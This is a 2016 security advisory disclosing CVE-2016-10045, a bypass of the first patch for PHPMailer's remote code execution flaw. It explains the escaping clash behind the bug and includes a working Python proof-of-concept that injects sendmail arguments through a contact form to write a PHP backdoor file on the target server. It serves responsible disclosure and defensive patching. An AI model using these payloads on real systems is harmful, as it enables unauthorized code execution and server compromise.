__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
<-- BACK TO legalhackers.com
~~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~
Interested in security / vulns / exploits ?
ExploitBox.io
A Playground & Labs for security folks into
hacking & the art of exploitation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10045
- Release date: 27.12.2016
- Last revision: 28.12.2016
- Revision 3.0
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
PHPMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit)
II. BACKGROUND
-------------------------
"PHPMailer continues to be the world's most popular transport class, with an
estimated 9 million users worldwide. Downloads continue at a significant
pace daily."
http://phpmailer.worxware.com/
"Probably the world's most popular code for sending email from PHP!
Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii,
Joomla! and many more"
https://github.com/PHPMailer/PHPMailer
III. INTRODUCTION
-------------------------
An independent research uncovered a critical vulnerability in PHPMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.
To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the PHPMailer class.
The first patch of the vulnerability CVE-2016-10033 was incomplete.
This advisory demonstrates the bypass of the patch.
The bypass allows to carry out Remote Code Execution on all current
versions (including 5.2.19).
NOTE:
The vulnerability / patch bypass was responsibly reported to the vendor
in private on December 26th and a new CVE was issued by MITRE on the same day.
However a potential bypass was publicly discussed on the oss-sec list.
Holding the advisory further would serve no purpose which is what triggered
the earlier release of this advisory.
IV. DESCRIPTION
-------------------------
The patch for CVE-2016-10033 vulnerability added in PHPMailer 5.2.17
sanitizes the $Sender variable by applying escapeshellarg() escaping
before the value is passed to mail() function.
It does not however take into account the clashing of the
escapeshellarg() function with internal escaping with escapeshellcmd()
performed by mail() function on the 5th parameter.
As a result it is possible to inject an extra quote that does not get
properly escaped and break out of the escapeshellarg() protection
applied by the patch in PHPMailer 5.2.17.
For example:
$mail->SetFrom("\"Attacker\\' -Param2 -Param3\"@test.com", 'Client Name');
will result in the followig list of arguments passed to sendmail program:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-f\"Attacker\\\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com']
An attacker could pass the -X parameter of sendmail to write out a
log file with arbitrary PHP code.
This makes the current latest 5.2.19 and 5.2.18 versions of PHPMailer
vulnerable to Remote Code Execution despite the patch.
A working PoC is presented below.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
#!/usr/bin/python
#PHPMailer_RCE_exploit.pl
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
"""
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib
import urllib2
import socket
import sys
RW_DIR = "/var/www/html/uploads"
url = 'http://VictimWebServer/contact_form.php' # Set destination URL here
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
#payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
RCE_PHP_CODE = "<?php phpinfo(); ?>"
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
~~~~~~~~~~~
More advanced exploit targetting a contact form can be found at:
https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py
The researcher also developed an Unauthenticated RCE exploit for a popular
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has
fixed the vulnerabilities.
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
VI. BUSINESS IMPACT
-------------------------
A successful exploitation could let remote attackers to gain access to
the target server in the context of the web server account which could
lead to a full compromise of the web application.
VII. SYSTEMS AFFECTED
-------------------------
All current versions of (PHPMailer <5.2.20) are affected.
Note that exploitation is not limited to systems with Sendmail MTA.
VIII. SOLUTION
-------------------------
No official solution is available at the moment.
NOTE:
The vulnerability / patch bypass was responsibly reported to the vendor
in private on December 26th and a new CVE was issued by MITRE on the same day.
However a potential bypass was publicly discussed on the oss-sec list.
Holding the advisory further would serve no purpose which is what triggered
the earlier release of this advisory.
The vendor has been working on a new patch since the private disclosure
on 26th December which should be published shortly.
IX. REFERENCES
-------------------------
https://legalhackers.com
This advisory (CVE-2016-10045):
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
WordPress Core 4.6 - RCE Remote Code Execution PoC Exploit:
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
https://www.youtube.com/watch?v=ZFt_S5pQPX0
The original vuln of CVE-2016-10033:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Video PoC exploit:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
https://www.youtube.com/watch?v=xyYMYvT2bx8
Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10045/PHPMailer_RCE_exploit.py
Combined exploit code for multiple targets:
https://legalhackers.com/exploits/CVE-2016-10033/10045/10034/10074/PwnScriptum_RCE_exploit.py
Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.
The previously undisclosed techniques and exploitation vectors will be described in a security
white-paper at:
https://legalhackers.com/papers/Pwning-PHP-mail-func-For-Fun-And-RCE-New-Exploit-Techniques-Vectors.html
https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045
PHPMailer / Vendor security updates / notices:
https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md
https://github.com/PHPMailer/PHPMailer
https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md
http://php.net/manual/en/function.mail.php
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
XI. REVISION HISTORY
-------------------------
28.12.2016 - Added NOTEs for the reason of the earlier disclosure
28.12.2016 - Advisory updated to extend the description
27.12.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
~~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~
Check out the new project of the same author:
ExploitBox.io
A Playground & Labs for security folks into
hacking & the art of exploitation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<-- BACK TO legalhackers.com